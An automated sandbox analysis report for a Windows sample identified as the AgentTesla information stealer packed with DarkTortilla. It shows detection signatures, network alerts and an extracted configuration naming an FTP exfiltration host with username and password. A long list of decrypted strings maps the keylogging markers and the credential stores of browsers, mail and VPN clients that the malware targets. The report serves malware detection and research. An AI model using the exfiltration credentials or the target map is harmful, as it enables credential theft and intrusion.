Loading Joe Sandbox Report ...

Edit tour

Windows Analysis Report
umVoLahqZn.exe

Overview

General Information

Sample name:umVoLahqZn.exe
renamed because original name is a hash value
Original sample name:325f8b7cb5f2bd3c93b6052bc44407c878feef638ed6303b9385185b05ac3f67.exe
Analysis ID:1569279
MD5:6142aad778dc57ae2ecfe036c2d11c4e
SHA1:73d3b45ab4812f445b6cf1c58ea7b7fdf47295a8
SHA256:325f8b7cb5f2bd3c93b6052bc44407c878feef638ed6303b9385185b05ac3f67
Tags:exeuser-adrian__luca
Infos:

Detection

AgentTesla, DarkTortilla
Score:100
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Antivirus / Scanner detection for submitted sample
Antivirus detection for URL or domain
Found malware configuration
Multi AV Scanner detection for submitted file
Suricata IDS alerts for network traffic
Yara detected AgentTesla
Yara detected AntiVM3
Yara detected DarkTortilla Crypter
.NET source code contains method to dynamically call methods (often used by packers)
AI detected suspicious sample
Allocates memory in foreign processes
Hides that the sample has been downloaded from the Internet (zone.identifier)
Injects a PE file into a foreign processes
Machine Learning detection for sample
Queries sensitive network adapter information (via WMI, Win32_NetworkAdapter, often done to detect virtual machines)
Sample uses string decryption to hide its real strings
Tries to harvest and steal Putty / WinSCP information (sessions, passwords, etc)
Tries to harvest and steal browser information (history, passwords, etc)
Tries to harvest and steal ftp login credentials
Tries to steal Mail credentials (via file / registry access)
Writes to foreign memory regions
Allocates memory with a write watch (potentially for evading sandboxes)
Contains functionality to launch a process as a different user
Contains long sleeps (>= 3 min)
Creates a process in suspended mode (likely to inject code)
Detected TCP or UDP traffic on non-standard ports
Detected potential crypto function
Enables debug privileges
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
IP address seen in connection with other malware
Internet Provider seen in connection with other malware
May sleep (evasive loops) to hinder dynamic analysis
Queries sensitive BIOS Information (via WMI, Win32_Bios & Win32_BaseBoard, often done to detect virtual machines)
Queries sensitive processor information (via WMI, Win32_Processor, often done to detect virtual machines)
Queries the volume information (name, serial number etc) of a device
Sample file is different than original file name gathered from version info
Uses 32bit PE files
Uses FTP
Uses code obfuscation techniques (call, push, ret)
Yara detected Credential Stealer

Classification

  • System is w10x64
  • umVoLahqZn.exe (PID: 5812 cmdline: "C:\Users\user\Desktop\umVoLahqZn.exe" MD5: 6142AAD778DC57AE2ECFE036C2D11C4E)
    • InstallUtil.exe (PID: 2968 cmdline: "C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe" MD5: 5D4073B2EB6D217C19F2B22F21BF8D57)
  • cleanup
NameDescriptionAttributionBlogpost URLsLink
Agent Tesla, AgentTeslaA .NET based information stealer readily available to actors due to leaked builders. The malware is able to log keystrokes, can access the host's clipboard and crawls the disk for credentials or other valuable information. It has the capability to send information back to its C&C via HTTP(S), SMTP, FTP, or towards a Telegram channel.
  • SWEED
https://malpedia.caad.fkie.fraunhofer.de/details/win.agent_tesla
NameDescriptionAttributionBlogpost URLsLink
DarkTortillaDarkTortilla is a complex and highly configurable .NET-based crypter that has possibly been active since at least August 2015. It typically delivers popular information stealers and remote access trojans (RATs) such as AgentTesla, AsyncRat, NanoCore, and RedLine. While it appears to primarily deliver commodity malware, Secureworks Counter Threat Unit (CTU) researchers identified DarkTortilla samples delivering targeted payloads such as Cobalt Strike and Metasploit. It can also deliver "addon packages" such as additional malicious payloads, benign decoy documents, and executables. It features robust anti-analysis and anti-tamper controls that can make detection, analysis, and eradication challenging.From January 2021 through May 2022, an average of 93 unique DarkTortilla samples per week were uploaded to the VirusTotal analysis service. Code similarities suggest possible links between DarkTortilla and other malware: a crypter operated by the RATs Crew threat group, which was active between 2008 and 2012, and the Gameloader malware that emerged in 2021.No Attributionhttps://malpedia.caad.fkie.fraunhofer.de/details/win.darktortilla
{"Exfil Mode": "FTP", "Host": "ftp://ftp.aminhacorretora.com.br", "Username": "logsftp@aminhacorretora.com.br", "Password": "_yA=,M5*J?KH"}
SourceRuleDescriptionAuthorStrings
dump.pcapJoeSecurity_AgentTesla_1Yara detected AgentTeslaJoe Security
    SourceRuleDescriptionAuthorStrings
    00000000.00000002.2724787687.00000000043E9000.00000004.00000800.00020000.00000000.sdmpJoeSecurity_DarkTortillaYara detected DarkTortilla CrypterJoe Security
      00000000.00000002.2724787687.00000000043E9000.00000004.00000800.00020000.00000000.sdmpJoeSecurity_AgentTesla_2Yara detected AgentTeslaJoe Security
        00000000.00000002.2724787687.000000000455E000.00000004.00000800.00020000.00000000.sdmpJoeSecurity_AgentTesla_2Yara detected AgentTeslaJoe Security
          00000004.00000002.3309819183.0000000000402000.00000040.00000400.00020000.00000000.sdmpJoeSecurity_AgentTesla_2Yara detected AgentTeslaJoe Security
            00000000.00000002.2724787687.000000000462F000.00000004.00000800.00020000.00000000.sdmpJoeSecurity_DarkTortillaYara detected DarkTortilla CrypterJoe Security
              Click to see the 11 entries
              SourceRuleDescriptionAuthorStrings
              0.2.umVoLahqZn.exe.4588612.1.unpackJoeSecurity_AgentTesla_2Yara detected AgentTeslaJoe Security
                0.2.umVoLahqZn.exe.45b20f2.3.unpackJoeSecurity_AgentTesla_2Yara detected AgentTeslaJoe Security
                  0.2.umVoLahqZn.exe.4659420.5.unpackJoeSecurity_AgentTesla_2Yara detected AgentTeslaJoe Security
                    0.2.umVoLahqZn.exe.4588612.1.raw.unpackJoeSecurity_AgentTesla_2Yara detected AgentTeslaJoe Security
                      0.2.umVoLahqZn.exe.462f142.2.unpackJoeSecurity_AgentTesla_2Yara detected AgentTeslaJoe Security
                        Click to see the 12 entries
                        No Sigma rule has matched
                        TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
                        2024-12-05T17:19:03.339168+010020299271A Network Trojan was detected192.168.2.549823162.241.203.3021TCP
                        TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
                        2024-12-05T17:19:04.266946+010028555421A Network Trojan was detected192.168.2.549830162.241.203.3049139TCP
                        2024-12-05T17:19:04.387388+010028555421A Network Trojan was detected192.168.2.549830162.241.203.3049139TCP

                        Click to jump to signature section

                        Show All Signature Results

                        AV Detection

                        barindex
                        Source: umVoLahqZn.exeAvira: detected
                        Source: http://ftp.aminhacorretora.com.brAvira URL Cloud: Label: malware
                        Source: http://aminhacorretora.com.brAvira URL Cloud: Label: malware
                        Source: 0.2.umVoLahqZn.exe.4659420.5.raw.unpackMalware Configuration Extractor: Agenttesla {"Exfil Mode": "FTP", "Host": "ftp://ftp.aminhacorretora.com.br", "Username": "logsftp@aminhacorretora.com.br", "Password": "_yA=,M5*J?KH"}
                        Source: umVoLahqZn.exeReversingLabs: Detection: 71%
                        Source: Submited SampleIntegrated Neural Analysis Model: Matched 100.0% probability
                        Source: umVoLahqZn.exeJoe Sandbox ML: detected
                        Source: 0.2.umVoLahqZn.exe.4659420.5.raw.unpackString decryptor: /log.tmp
                        Source: 0.2.umVoLahqZn.exe.4659420.5.raw.unpackString decryptor: yyyy_MM_dd_HH_mm_ss
                        Source: 0.2.umVoLahqZn.exe.4659420.5.raw.unpackString decryptor: .html
                        Source: 0.2.umVoLahqZn.exe.4659420.5.raw.unpackString decryptor: <html>
                        Source: 0.2.umVoLahqZn.exe.4659420.5.raw.unpackString decryptor: </html>
                        Source: 0.2.umVoLahqZn.exe.4659420.5.raw.unpackString decryptor: yyyy_MM_dd_HH_mm_ss
                        Source: 0.2.umVoLahqZn.exe.4659420.5.raw.unpackString decryptor: .html
                        Source: 0.2.umVoLahqZn.exe.4659420.5.raw.unpackString decryptor: <html>
                        Source: 0.2.umVoLahqZn.exe.4659420.5.raw.unpackString decryptor: </html>
                        Source: 0.2.umVoLahqZn.exe.4659420.5.raw.unpackString decryptor: <br>[
                        Source: 0.2.umVoLahqZn.exe.4659420.5.raw.unpackString decryptor: yyyy-MM-dd HH:mm:ss
                        Source: 0.2.umVoLahqZn.exe.4659420.5.raw.unpackString decryptor: ]<br>
                        Source: 0.2.umVoLahqZn.exe.4659420.5.raw.unpackString decryptor: <br>
                        Source: 0.2.umVoLahqZn.exe.4659420.5.raw.unpackString decryptor: yyyy_MM_dd_HH_mm_ss
                        Source: 0.2.umVoLahqZn.exe.4659420.5.raw.unpackString decryptor: .html
                        Source: 0.2.umVoLahqZn.exe.4659420.5.raw.unpackString decryptor: yyyy_MM_dd_HH_mm_ss
                        Source: 0.2.umVoLahqZn.exe.4659420.5.raw.unpackString decryptor: .zip
                        Source: 0.2.umVoLahqZn.exe.4659420.5.raw.unpackString decryptor: Time:
                        Source: 0.2.umVoLahqZn.exe.4659420.5.raw.unpackString decryptor: MM/dd/yyyy HH:mm:ss
                        Source: 0.2.umVoLahqZn.exe.4659420.5.raw.unpackString decryptor: <br>User Name:
                        Source: 0.2.umVoLahqZn.exe.4659420.5.raw.unpackString decryptor: <br>Computer Name:
                        Source: 0.2.umVoLahqZn.exe.4659420.5.raw.unpackString decryptor: <br>OSFullName:
                        Source: 0.2.umVoLahqZn.exe.4659420.5.raw.unpackString decryptor: <br>CPU:
                        Source: 0.2.umVoLahqZn.exe.4659420.5.raw.unpackString decryptor: <br>RAM:
                        Source: 0.2.umVoLahqZn.exe.4659420.5.raw.unpackString decryptor: <br>
                        Source: 0.2.umVoLahqZn.exe.4659420.5.raw.unpackString decryptor: IP Address:
                        Source: 0.2.umVoLahqZn.exe.4659420.5.raw.unpackString decryptor: <br>
                        Source: 0.2.umVoLahqZn.exe.4659420.5.raw.unpackString decryptor: <hr>
                        Source: 0.2.umVoLahqZn.exe.4659420.5.raw.unpackString decryptor: New
                        Source: 0.2.umVoLahqZn.exe.4659420.5.raw.unpackString decryptor: MM/dd/yyyy HH:mm:ss
                        Source: 0.2.umVoLahqZn.exe.4659420.5.raw.unpackString decryptor: IP Address:
                        Source: 0.2.umVoLahqZn.exe.4659420.5.raw.unpackString decryptor: false
                        Source: 0.2.umVoLahqZn.exe.4659420.5.raw.unpackString decryptor: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:99.0) Gecko/20100101 Firefox/99.0
                        Source: 0.2.umVoLahqZn.exe.4659420.5.raw.unpackString decryptor: false
                        Source: 0.2.umVoLahqZn.exe.4659420.5.raw.unpackString decryptor: false
                        Source: 0.2.umVoLahqZn.exe.4659420.5.raw.unpackString decryptor: false
                        Source: 0.2.umVoLahqZn.exe.4659420.5.raw.unpackString decryptor: false
                        Source: 0.2.umVoLahqZn.exe.4659420.5.raw.unpackString decryptor: true
                        Source: 0.2.umVoLahqZn.exe.4659420.5.raw.unpackString decryptor: false
                        Source: 0.2.umVoLahqZn.exe.4659420.5.raw.unpackString decryptor: ftp://ftp.aminhacorretora.com.br
                        Source: 0.2.umVoLahqZn.exe.4659420.5.raw.unpackString decryptor: logsftp@aminhacorretora.com.br
                        Source: 0.2.umVoLahqZn.exe.4659420.5.raw.unpackString decryptor: _yA=,M5*J?KH
                        Source: 0.2.umVoLahqZn.exe.4659420.5.raw.unpackString decryptor: false
                        Source: 0.2.umVoLahqZn.exe.4659420.5.raw.unpackString decryptor: false
                        Source: 0.2.umVoLahqZn.exe.4659420.5.raw.unpackString decryptor: appdata
                        Source: 0.2.umVoLahqZn.exe.4659420.5.raw.unpackString decryptor: XVWmeW
                        Source: 0.2.umVoLahqZn.exe.4659420.5.raw.unpackString decryptor: XVWmeW.exe
                        Source: 0.2.umVoLahqZn.exe.4659420.5.raw.unpackString decryptor: XVWmeW
                        Source: 0.2.umVoLahqZn.exe.4659420.5.raw.unpackString decryptor: Type
                        Source: 0.2.umVoLahqZn.exe.4659420.5.raw.unpackString decryptor: <br>
                        Source: 0.2.umVoLahqZn.exe.4659420.5.raw.unpackString decryptor: <hr>
                        Source: 0.2.umVoLahqZn.exe.4659420.5.raw.unpackString decryptor: <br>
                        Source: 0.2.umVoLahqZn.exe.4659420.5.raw.unpackString decryptor: <b>[
                        Source: 0.2.umVoLahqZn.exe.4659420.5.raw.unpackString decryptor: ]</b> (
                        Source: 0.2.umVoLahqZn.exe.4659420.5.raw.unpackString decryptor: )<br>
                        Source: 0.2.umVoLahqZn.exe.4659420.5.raw.unpackString decryptor: {BACK}
                        Source: 0.2.umVoLahqZn.exe.4659420.5.raw.unpackString decryptor: {ALT+TAB}
                        Source: 0.2.umVoLahqZn.exe.4659420.5.raw.unpackString decryptor: {ALT+F4}
                        Source: 0.2.umVoLahqZn.exe.4659420.5.raw.unpackString decryptor: {TAB}
                        Source: 0.2.umVoLahqZn.exe.4659420.5.raw.unpackString decryptor: {ESC}
                        Source: 0.2.umVoLahqZn.exe.4659420.5.raw.unpackString decryptor: {Win}
                        Source: 0.2.umVoLahqZn.exe.4659420.5.raw.unpackString decryptor: {CAPSLOCK}
                        Source: 0.2.umVoLahqZn.exe.4659420.5.raw.unpackString decryptor: {KEYUP}
                        Source: 0.2.umVoLahqZn.exe.4659420.5.raw.unpackString decryptor: {KEYDOWN}
                        Source: 0.2.umVoLahqZn.exe.4659420.5.raw.unpackString decryptor: {KEYLEFT}
                        Source: 0.2.umVoLahqZn.exe.4659420.5.raw.unpackString decryptor: {KEYRIGHT}
                        Source: 0.2.umVoLahqZn.exe.4659420.5.raw.unpackString decryptor: {DEL}
                        Source: 0.2.umVoLahqZn.exe.4659420.5.raw.unpackString decryptor: {END}
                        Source: 0.2.umVoLahqZn.exe.4659420.5.raw.unpackString decryptor: {HOME}
                        Source: 0.2.umVoLahqZn.exe.4659420.5.raw.unpackString decryptor: {Insert}
                        Source: 0.2.umVoLahqZn.exe.4659420.5.raw.unpackString decryptor: {NumLock}
                        Source: 0.2.umVoLahqZn.exe.4659420.5.raw.unpackString decryptor: {PageDown}
                        Source: 0.2.umVoLahqZn.exe.4659420.5.raw.unpackString decryptor: {PageUp}
                        Source: 0.2.umVoLahqZn.exe.4659420.5.raw.unpackString decryptor: {ENTER}
                        Source: 0.2.umVoLahqZn.exe.4659420.5.raw.unpackString decryptor: {F1}
                        Source: 0.2.umVoLahqZn.exe.4659420.5.raw.unpackString decryptor: {F2}
                        Source: 0.2.umVoLahqZn.exe.4659420.5.raw.unpackString decryptor: {F3}
                        Source: 0.2.umVoLahqZn.exe.4659420.5.raw.unpackString decryptor: {F4}
                        Source: 0.2.umVoLahqZn.exe.4659420.5.raw.unpackString decryptor: {F5}
                        Source: 0.2.umVoLahqZn.exe.4659420.5.raw.unpackString decryptor: {F6}
                        Source: 0.2.umVoLahqZn.exe.4659420.5.raw.unpackString decryptor: {F7}
                        Source: 0.2.umVoLahqZn.exe.4659420.5.raw.unpackString decryptor: {F8}
                        Source: 0.2.umVoLahqZn.exe.4659420.5.raw.unpackString decryptor: {F9}
                        Source: 0.2.umVoLahqZn.exe.4659420.5.raw.unpackString decryptor: {F10}
                        Source: 0.2.umVoLahqZn.exe.4659420.5.raw.unpackString decryptor: {F11}
                        Source: 0.2.umVoLahqZn.exe.4659420.5.raw.unpackString decryptor: {F12}
                        Source: 0.2.umVoLahqZn.exe.4659420.5.raw.unpackString decryptor: control
                        Source: 0.2.umVoLahqZn.exe.4659420.5.raw.unpackString decryptor: {CTRL}
                        Source: 0.2.umVoLahqZn.exe.4659420.5.raw.unpackString decryptor: &amp;
                        Source: 0.2.umVoLahqZn.exe.4659420.5.raw.unpackString decryptor: &lt;
                        Source: 0.2.umVoLahqZn.exe.4659420.5.raw.unpackString decryptor: &gt;
                        Source: 0.2.umVoLahqZn.exe.4659420.5.raw.unpackString decryptor: &quot;
                        Source: 0.2.umVoLahqZn.exe.4659420.5.raw.unpackString decryptor: <br><hr>Copied Text: <br>
                        Source: 0.2.umVoLahqZn.exe.4659420.5.raw.unpackString decryptor: <hr>
                        Source: 0.2.umVoLahqZn.exe.4659420.5.raw.unpackString decryptor: logins
                        Source: 0.2.umVoLahqZn.exe.4659420.5.raw.unpackString decryptor: IE/Edge
                        Source: 0.2.umVoLahqZn.exe.4659420.5.raw.unpackString decryptor: 2F1A6504-0641-44CF-8BB5-3612D865F2E5
                        Source: 0.2.umVoLahqZn.exe.4659420.5.raw.unpackString decryptor: Windows Secure Note
                        Source: 0.2.umVoLahqZn.exe.4659420.5.raw.unpackString decryptor: 3CCD5499-87A8-4B10-A215-608888DD3B55
                        Source: 0.2.umVoLahqZn.exe.4659420.5.raw.unpackString decryptor: Windows Web Password Credential
                        Source: 0.2.umVoLahqZn.exe.4659420.5.raw.unpackString decryptor: 154E23D0-C644-4E6F-8CE6-5069272F999F
                        Source: 0.2.umVoLahqZn.exe.4659420.5.raw.unpackString decryptor: Windows Credential Picker Protector
                        Source: 0.2.umVoLahqZn.exe.4659420.5.raw.unpackString decryptor: 4BF4C442-9B8A-41A0-B380-DD4A704DDB28
                        Source: 0.2.umVoLahqZn.exe.4659420.5.raw.unpackString decryptor: Web Credentials
                        Source: 0.2.umVoLahqZn.exe.4659420.5.raw.unpackString decryptor: 77BC582B-F0A6-4E15-4E80-61736B6F3B29
                        Source: 0.2.umVoLahqZn.exe.4659420.5.raw.unpackString decryptor: Windows Credentials
                        Source: 0.2.umVoLahqZn.exe.4659420.5.raw.unpackString decryptor: E69D7838-91B5-4FC9-89D5-230D4D4CC2BC
                        Source: 0.2.umVoLahqZn.exe.4659420.5.raw.unpackString decryptor: Windows Domain Certificate Credential
                        Source: 0.2.umVoLahqZn.exe.4659420.5.raw.unpackString decryptor: 3E0E35BE-1B77-43E7-B873-AED901B6275B
                        Source: 0.2.umVoLahqZn.exe.4659420.5.raw.unpackString decryptor: Windows Domain Password Credential
                        Source: 0.2.umVoLahqZn.exe.4659420.5.raw.unpackString decryptor: 3C886FF3-2669-4AA2-A8FB-3F6759A77548
                        Source: 0.2.umVoLahqZn.exe.4659420.5.raw.unpackString decryptor: Windows Extended Credential
                        Source: 0.2.umVoLahqZn.exe.4659420.5.raw.unpackString decryptor: 00000000-0000-0000-0000-000000000000
                        Source: 0.2.umVoLahqZn.exe.4659420.5.raw.unpackString decryptor: SchemaId
                        Source: 0.2.umVoLahqZn.exe.4659420.5.raw.unpackString decryptor: pResourceElement
                        Source: 0.2.umVoLahqZn.exe.4659420.5.raw.unpackString decryptor: pIdentityElement
                        Source: 0.2.umVoLahqZn.exe.4659420.5.raw.unpackString decryptor: pPackageSid
                        Source: 0.2.umVoLahqZn.exe.4659420.5.raw.unpackString decryptor: pAuthenticatorElement
                        Source: 0.2.umVoLahqZn.exe.4659420.5.raw.unpackString decryptor: IE/Edge
                        Source: 0.2.umVoLahqZn.exe.4659420.5.raw.unpackString decryptor: UC Browser
                        Source: 0.2.umVoLahqZn.exe.4659420.5.raw.unpackString decryptor: UCBrowser\
                        Source: 0.2.umVoLahqZn.exe.4659420.5.raw.unpackString decryptor: Login Data
                        Source: 0.2.umVoLahqZn.exe.4659420.5.raw.unpackString decryptor: journal
                        Source: 0.2.umVoLahqZn.exe.4659420.5.raw.unpackString decryptor: wow_logins
                        Source: 0.2.umVoLahqZn.exe.4659420.5.raw.unpackString decryptor: Safari for Windows
                        Source: 0.2.umVoLahqZn.exe.4659420.5.raw.unpackString decryptor: \Common Files\Apple\Apple Application Support\plutil.exe
                        Source: 0.2.umVoLahqZn.exe.4659420.5.raw.unpackString decryptor: \Apple Computer\Preferences\keychain.plist
                        Source: 0.2.umVoLahqZn.exe.4659420.5.raw.unpackString decryptor: <array>
                        Source: 0.2.umVoLahqZn.exe.4659420.5.raw.unpackString decryptor: <dict>
                        Source: 0.2.umVoLahqZn.exe.4659420.5.raw.unpackString decryptor: <string>
                        Source: 0.2.umVoLahqZn.exe.4659420.5.raw.unpackString decryptor: </string>
                        Source: 0.2.umVoLahqZn.exe.4659420.5.raw.unpackString decryptor: <string>
                        Source: 0.2.umVoLahqZn.exe.4659420.5.raw.unpackString decryptor: </string>
                        Source: 0.2.umVoLahqZn.exe.4659420.5.raw.unpackString decryptor: <data>
                        Source: 0.2.umVoLahqZn.exe.4659420.5.raw.unpackString decryptor: </data>
                        Source: 0.2.umVoLahqZn.exe.4659420.5.raw.unpackString decryptor: -convert xml1 -s -o "
                        Source: 0.2.umVoLahqZn.exe.4659420.5.raw.unpackString decryptor: \fixed_keychain.xml"
                        Source: 0.2.umVoLahqZn.exe.4659420.5.raw.unpackString decryptor: \Microsoft\Credentials\
                        Source: 0.2.umVoLahqZn.exe.4659420.5.raw.unpackString decryptor: \Microsoft\Credentials\
                        Source: 0.2.umVoLahqZn.exe.4659420.5.raw.unpackString decryptor: \Microsoft\Credentials\
                        Source: 0.2.umVoLahqZn.exe.4659420.5.raw.unpackString decryptor: \Microsoft\Credentials\
                        Source: 0.2.umVoLahqZn.exe.4659420.5.raw.unpackString decryptor: \Microsoft\Protect\
                        Source: 0.2.umVoLahqZn.exe.4659420.5.raw.unpackString decryptor: credential
                        Source: 0.2.umVoLahqZn.exe.4659420.5.raw.unpackString decryptor: QQ Browser
                        Source: 0.2.umVoLahqZn.exe.4659420.5.raw.unpackString decryptor: Tencent\QQBrowser\User Data
                        Source: 0.2.umVoLahqZn.exe.4659420.5.raw.unpackString decryptor: \Default\EncryptedStorage
                        Source: 0.2.umVoLahqZn.exe.4659420.5.raw.unpackString decryptor: Profile
                        Source: 0.2.umVoLahqZn.exe.4659420.5.raw.unpackString decryptor: \EncryptedStorage
                        Source: 0.2.umVoLahqZn.exe.4659420.5.raw.unpackString decryptor: entries
                        Source: 0.2.umVoLahqZn.exe.4659420.5.raw.unpackString decryptor: category
                        Source: 0.2.umVoLahqZn.exe.4659420.5.raw.unpackString decryptor: Password
                        Source: 0.2.umVoLahqZn.exe.4659420.5.raw.unpackString decryptor: str3
                        Source: 0.2.umVoLahqZn.exe.4659420.5.raw.unpackString decryptor: str2
                        Source: 0.2.umVoLahqZn.exe.4659420.5.raw.unpackString decryptor: blob0
                        Source: 0.2.umVoLahqZn.exe.4659420.5.raw.unpackString decryptor: password_value
                        Source: 0.2.umVoLahqZn.exe.4659420.5.raw.unpackString decryptor: IncrediMail
                        Source: 0.2.umVoLahqZn.exe.4659420.5.raw.unpackString decryptor: PopPassword
                        Source: 0.2.umVoLahqZn.exe.4659420.5.raw.unpackString decryptor: SmtpPassword
                        Source: 0.2.umVoLahqZn.exe.4659420.5.raw.unpackString decryptor: Software\IncrediMail\Identities\
                        Source: 0.2.umVoLahqZn.exe.4659420.5.raw.unpackString decryptor: \Accounts_New
                        Source: 0.2.umVoLahqZn.exe.4659420.5.raw.unpackString decryptor: PopPassword
                        Source: 0.2.umVoLahqZn.exe.4659420.5.raw.unpackString decryptor: SmtpPassword
                        Source: 0.2.umVoLahqZn.exe.4659420.5.raw.unpackString decryptor: SmtpServer
                        Source: 0.2.umVoLahqZn.exe.4659420.5.raw.unpackString decryptor: EmailAddress
                        Source: 0.2.umVoLahqZn.exe.4659420.5.raw.unpackString decryptor: Eudora
                        Source: 0.2.umVoLahqZn.exe.4659420.5.raw.unpackString decryptor: Software\Qualcomm\Eudora\CommandLine\
                        Source: 0.2.umVoLahqZn.exe.4659420.5.raw.unpackString decryptor: current
                        Source: 0.2.umVoLahqZn.exe.4659420.5.raw.unpackString decryptor: Settings
                        Source: 0.2.umVoLahqZn.exe.4659420.5.raw.unpackString decryptor: SavePasswordText
                        Source: 0.2.umVoLahqZn.exe.4659420.5.raw.unpackString decryptor: Settings
                        Source: 0.2.umVoLahqZn.exe.4659420.5.raw.unpackString decryptor: ReturnAddress
                        Source: 0.2.umVoLahqZn.exe.4659420.5.raw.unpackString decryptor: Falkon Browser
                        Source: 0.2.umVoLahqZn.exe.4659420.5.raw.unpackString decryptor: \falkon\profiles\
                        Source: 0.2.umVoLahqZn.exe.4659420.5.raw.unpackString decryptor: profiles.ini
                        Source: 0.2.umVoLahqZn.exe.4659420.5.raw.unpackString decryptor: startProfile=([A-z0-9\/\.\"]+)
                        Source: 0.2.umVoLahqZn.exe.4659420.5.raw.unpackString decryptor: profiles.ini
                        Source: 0.2.umVoLahqZn.exe.4659420.5.raw.unpackString decryptor: \browsedata.db
                        Source: 0.2.umVoLahqZn.exe.4659420.5.raw.unpackString decryptor: autofill
                        Source: 0.2.umVoLahqZn.exe.4659420.5.raw.unpackString decryptor: ClawsMail
                        Source: 0.2.umVoLahqZn.exe.4659420.5.raw.unpackString decryptor: \Claws-mail
                        Source: 0.2.umVoLahqZn.exe.4659420.5.raw.unpackString decryptor: \clawsrc
                        Source: 0.2.umVoLahqZn.exe.4659420.5.raw.unpackString decryptor: \clawsrc
                        Source: 0.2.umVoLahqZn.exe.4659420.5.raw.unpackString decryptor: passkey0
                        Source: 0.2.umVoLahqZn.exe.4659420.5.raw.unpackString decryptor: master_passphrase_salt=(.+)
                        Source: 0.2.umVoLahqZn.exe.4659420.5.raw.unpackString decryptor: master_passphrase_pbkdf2_rounds=(.+)
                        Source: 0.2.umVoLahqZn.exe.4659420.5.raw.unpackString decryptor: \accountrc
                        Source: 0.2.umVoLahqZn.exe.4659420.5.raw.unpackString decryptor: smtp_server
                        Source: 0.2.umVoLahqZn.exe.4659420.5.raw.unpackString decryptor: address
                        Source: 0.2.umVoLahqZn.exe.4659420.5.raw.unpackString decryptor: account
                        Source: 0.2.umVoLahqZn.exe.4659420.5.raw.unpackString decryptor: \passwordstorerc
                        Source: 0.2.umVoLahqZn.exe.4659420.5.raw.unpackString decryptor: {(.*),(.*)}(.*)
                        Source: 0.2.umVoLahqZn.exe.4659420.5.raw.unpackString decryptor: Flock Browser
                        Source: 0.2.umVoLahqZn.exe.4659420.5.raw.unpackString decryptor: APPDATA
                        Source: 0.2.umVoLahqZn.exe.4659420.5.raw.unpackString decryptor: \Flock\Browser\
                        Source: 0.2.umVoLahqZn.exe.4659420.5.raw.unpackString decryptor: signons3.txt
                        Source: 0.2.umVoLahqZn.exe.4659420.5.raw.unpackString decryptor: DynDns
                        Source: 0.2.umVoLahqZn.exe.4659420.5.raw.unpackString decryptor: ALLUSERSPROFILE
                        Source: 0.2.umVoLahqZn.exe.4659420.5.raw.unpackString decryptor: Dyn\Updater\config.dyndns
                        Source: 0.2.umVoLahqZn.exe.4659420.5.raw.unpackString decryptor: username=
                        Source: 0.2.umVoLahqZn.exe.4659420.5.raw.unpackString decryptor: password=
                        Source: 0.2.umVoLahqZn.exe.4659420.5.raw.unpackString decryptor: https://account.dyn.com/
                        Source: 0.2.umVoLahqZn.exe.4659420.5.raw.unpackString decryptor: t6KzXhCh
                        Source: 0.2.umVoLahqZn.exe.4659420.5.raw.unpackString decryptor: ALLUSERSPROFILE
                        Source: 0.2.umVoLahqZn.exe.4659420.5.raw.unpackString decryptor: Dyn\Updater\daemon.cfg
                        Source: 0.2.umVoLahqZn.exe.4659420.5.raw.unpackString decryptor: global
                        Source: 0.2.umVoLahqZn.exe.4659420.5.raw.unpackString decryptor: accounts
                        Source: 0.2.umVoLahqZn.exe.4659420.5.raw.unpackString decryptor: account.
                        Source: 0.2.umVoLahqZn.exe.4659420.5.raw.unpackString decryptor: username
                        Source: 0.2.umVoLahqZn.exe.4659420.5.raw.unpackString decryptor: account.
                        Source: 0.2.umVoLahqZn.exe.4659420.5.raw.unpackString decryptor: password
                        Source: 0.2.umVoLahqZn.exe.4659420.5.raw.unpackString decryptor: Psi/Psi+
                        Source: 0.2.umVoLahqZn.exe.4659420.5.raw.unpackString decryptor: name
                        Source: 0.2.umVoLahqZn.exe.4659420.5.raw.unpackString decryptor: password
                        Source: 0.2.umVoLahqZn.exe.4659420.5.raw.unpackString decryptor: Psi/Psi+
                        Source: 0.2.umVoLahqZn.exe.4659420.5.raw.unpackString decryptor: APPDATA
                        Source: 0.2.umVoLahqZn.exe.4659420.5.raw.unpackString decryptor: \Psi\profiles
                        Source: 0.2.umVoLahqZn.exe.4659420.5.raw.unpackString decryptor: APPDATA
                        Source: 0.2.umVoLahqZn.exe.4659420.5.raw.unpackString decryptor: \Psi+\profiles
                        Source: 0.2.umVoLahqZn.exe.4659420.5.raw.unpackString decryptor: \accounts.xml
                        Source: 0.2.umVoLahqZn.exe.4659420.5.raw.unpackString decryptor: \accounts.xml
                        Source: 0.2.umVoLahqZn.exe.4659420.5.raw.unpackString decryptor: OpenVPN
                        Source: 0.2.umVoLahqZn.exe.4659420.5.raw.unpackString decryptor: Software\OpenVPN-GUI\configs
                        Source: 0.2.umVoLahqZn.exe.4659420.5.raw.unpackString decryptor: Software\OpenVPN-GUI\configs
                        Source: 0.2.umVoLahqZn.exe.4659420.5.raw.unpackString decryptor: Software\OpenVPN-GUI\configs\
                        Source: 0.2.umVoLahqZn.exe.4659420.5.raw.unpackString decryptor: username
                        Source: 0.2.umVoLahqZn.exe.4659420.5.raw.unpackString decryptor: auth-data
                        Source: 0.2.umVoLahqZn.exe.4659420.5.raw.unpackString decryptor: entropy
                        Source: 0.2.umVoLahqZn.exe.4659420.5.raw.unpackString decryptor: USERPROFILE
                        Source: 0.2.umVoLahqZn.exe.4659420.5.raw.unpackString decryptor: \OpenVPN\config\
                        Source: 0.2.umVoLahqZn.exe.4659420.5.raw.unpackString decryptor: remote
                        Source: 0.2.umVoLahqZn.exe.4659420.5.raw.unpackString decryptor: remote
                        Source: 0.2.umVoLahqZn.exe.4659420.5.raw.unpackString decryptor: NordVPN
                        Source: 0.2.umVoLahqZn.exe.4659420.5.raw.unpackString decryptor: NordVPN
                        Source: 0.2.umVoLahqZn.exe.4659420.5.raw.unpackString decryptor: NordVpn.exe*
                        Source: 0.2.umVoLahqZn.exe.4659420.5.raw.unpackString decryptor: user.config
                        Source: 0.2.umVoLahqZn.exe.4659420.5.raw.unpackString decryptor: //setting[@name='Username']/value
                        Source: 0.2.umVoLahqZn.exe.4659420.5.raw.unpackString decryptor: //setting[@name='Password']/value
                        Source: 0.2.umVoLahqZn.exe.4659420.5.raw.unpackString decryptor: NordVPN
